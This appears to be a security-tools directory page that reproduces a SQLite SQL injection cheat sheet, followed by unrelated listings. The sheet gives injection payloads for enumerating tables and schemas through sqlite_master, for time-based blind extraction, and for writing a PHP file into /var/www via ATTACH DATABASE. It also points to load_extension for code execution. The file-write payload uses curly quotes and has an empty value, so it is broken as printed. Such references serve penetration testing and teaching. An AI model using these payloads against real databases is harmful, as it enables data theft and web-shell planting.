SQLite SQL Injection Cheat Sheet Logo

SQLite SQL Injection Cheat Sheet

0
Free
Visit Website

If you need You use Concatenation || Comments -- Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' Substring substr(string,start,stop) Length length(string) Quotes without literal quotes cast(X'27' as text) --use X'22' for double quotes Table name enumeration SELECT name FROM sqlite_master WHERE type='table' Table schema enumeration SELECT sql FROM sqlite_master WHERE type='table' Time-based data extraction cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true' File writing 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled Arbitrary Code Execution load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration

FEATURES

ALTERNATIVES

A comprehensive guide to network security monitoring, teaching readers how to detect and respond to intrusions using open source software and vendor-neutral tools.

Java MODBUS simulator with scriptable functions and dynamic resource creation.

A comprehensive guide to navigating the world of secure messaging apps, providing insights and recommendations to help you make an informed decision.

Cybersecurity training platform with courses, certifications, and study guides.

A repository of cybersecurity conference presentation slides from Black Hat, Offensivecon, and REcon.

A documentation template library for implementing industrial information security management systems.

A wargame that challenges your hacking skills

A website for information on Linux and BSD distributions.

CyberSecTools logoCyberSecTools

Explore the largest curated directory of cybersecurity tools and resources to enhance your security practices. Find the right solution for your domain.

Copyright © 2024 - All rights reserved